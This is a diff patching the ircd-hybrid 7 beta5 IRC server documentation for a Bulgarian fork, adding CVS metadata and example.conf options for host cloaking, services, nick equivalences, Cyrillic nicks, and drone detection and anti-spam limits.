diff -uNrd ircd-hybrid-7beta5/doc/CVS/Entries hybrid7-bg/doc/CVS/Entries
--- ircd-hybrid-7beta5/doc/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/CVS/Entries	Wed Jul 24 18:31:58 2002
@@ -0,0 +1,39 @@
+/CIDR.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/LazyLinks.as.implemented.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/LazyLinks.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/Persistent_Clients.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/README.TSora/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/Tao-of-IRC.940110/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/challenge.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/cookies.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/cryptlink.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/event.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/example.conf/1.13/Thu Jul 11 19:00:57 2002//
+/fd-management.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/file-management.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/guidelines.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/hostmask.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/iauth.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/index.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/ircd.8/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/ircd.motd/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/kline.conf/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/kline.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/linebuf.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/message-customisation.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/modeg.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/modes.txt/1.7/Wed Jul 10 11:19:20 2002//
+/network.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/operguide.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/opermyth.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/opers.txt/1.7/Mon Jun 10 04:39:15 2002//
+/rfc1459.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/send.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/server-version-info/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/simple.conf/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/users.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/vchans.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/whats-new-code.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/whats-new.txt/1.1.1.1/Tue Jun  5 16:35:42 2001//
+D/old////
diff -uNrd ircd-hybrid-7beta5/doc/CVS/Repository hybrid7-bg/doc/CVS/Repository
--- ircd-hybrid-7beta5/doc/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/CVS/Repository	Wed Jul 24 18:31:57 2002
@@ -0,0 +1 @@
+hybrid7-bg/doc
diff -uNrd ircd-hybrid-7beta5/doc/CVS/Root hybrid7-bg/doc/CVS/Root
--- ircd-hybrid-7beta5/doc/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/CVS/Root	Wed Jul 24 18:31:57 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/doc/example.conf hybrid7-bg/doc/example.conf
--- ircd-hybrid-7beta5/doc/example.conf	Mon May  7 11:50:21 2001
+++ hybrid7-bg/doc/example.conf	Thu Jul 11 15:00:57 2002
@@ -1,5 +1,5 @@
 /* Hybrid 7 Example configuration file
- * $Id: example.conf,v 7.93 2001/05/07 15:50:21 toot Exp $
+ * $Id: example.conf,v 1.13 2002/07/11 19:00:57 Administrator Exp $
  * December 2000 - ejb, wcampbel, db and others
  */
 
@@ -220,6 +220,12 @@
 	gline_exempt = yes;
 
 	class = "opers";
+
+	/* this will cause auth block matching 
+	 * to continue if the password supplied
+	 * is incorrect               -demond
+	 */
+	skip_on_fail = yes;
 };
 
 auth {
@@ -288,6 +294,11 @@
 
 	/* We can force the user to have ident here (I: + flag) */
 	have_ident = yes;
+	
+	/* this will cloak client host
+	 *                   -demond
+	 */
+	maskhost = yes;
 };
 
 /* Define operators, old O: lines.
@@ -481,6 +492,43 @@
 	host = "hostname";
 };
 
+/* This will determine which servers are to be treated specially,
+ * as services. We now use this for SVSNICK handling.    -demond
+ */
+services {
+	name = "services.ca";
+};
+
+/* This will make the nick redirection we need on IRC Bulgaria
+ *                                           -demond
+ */
+equivalent {
+	nicks = "NS/NickServ";
+	nicks = "CS/ChanServ";
+	nicks = "OS/OperServ";
+};
+
+/* Describe which (pseudo) servers are to be treated specially
+ *                                           -demond
+ */
+relays {
+	name = "unibg-r.bulgaria.org";
+	name = "dalnet-r.bulgaria.org";
+	name = "under-r.bulgaria.org";
+};
+
+/* Defines USER host & server parameters of several known clients
+ *                                           -demond
+ */
+userpar {
+        param = "host/server";
+        param = "localhost";
+        param = "./.";
+        param = "0/0";
+        param = "blah/blah";
+        param = "php/html2";
+};
+
 /* Replacement for K: lines, bans based on user@host */
 kill {
 	user = "bad@*.hacked.edu";
@@ -709,6 +757,11 @@
 	fname_operlog = "logs/operlog";
 	fname_foperlog = "logs/foperlog";
 
+	/* Network identification string, for host cloaking
+	 *                                       -demond
+         */
+	netid = "bnet";
+
 	/* max_targets
 	 * only max_target targets can be PRIVMSG'ed / NOTICE'd in a single
 	 * command. default is 4 if not defined here. setting to 0 will have
@@ -746,13 +799,14 @@
 	 * +x - external   - See remote server connection and split notices
 	 * +y - spy        - See LINKS, STATS (if configured), TRACE notices
 	 * +z - operwall   - See oper generated WALLOPS
+         * +q - rconn      - See remote client connections
          *
          * List of usermodes that only operators can set.  Useful for
 	 * stopping clients setting modes they shouldnt be using like wallops.
 	 */
 	oper_only_umodes = bots, cconn, debug, full, skill, nchange, 
                            rej, spy, external, operwall, drone, locops,
-			   unauth;
+			   unauth, rconn;
 
         /* List of usermodes that get set when a user /oper's
          * Default: locops, wallop, operwall, servnotice.	
@@ -778,6 +832,43 @@
          * down.
 	 */
         persistant_expire_time = 24 hours;
+
+	/* Allow cyrillic (Windows-1251) in nicks & usernames
+	 *                                       -demond
+	 */
+	cyrillic = no;
+
+	/* Translate all sendto_channel() stuff to umode +T/+Y users
+         * (WARNING: this may take clients out of sync!)
+	 *                                       -demond
+	 */
+	totaltrans = no;
+
+	/* maximum time allowed for client to issue USERHOST, WHO or MODE
+	 * before we mark them as pottential trojan drone
+	 *                                       -demond
+	 */
+	grace_time = 10 seconds;
+
+	/* the following deals with drone detection/kline
+	 *                                       -demond
+	 */
+	drone_kline = yes;
+	drone_batch = yes;
+	drone_rate_max = 3;
+	drone_rate_period = 20 seconds;
+	drone_kline_time = 300 minutes;
+	drone_reason = "possible trojan drone";
+	
+	/* anti-spam onjoin/onleave muting period
+	 *                                       -demond
+	 */
+	spam_wait = 5 seconds;
+
+	/* repeat buffers purge period, don't set too low
+	 *                                       -demond
+	 */
+	repeat_grace = 20 seconds;
 };
 
 modules {
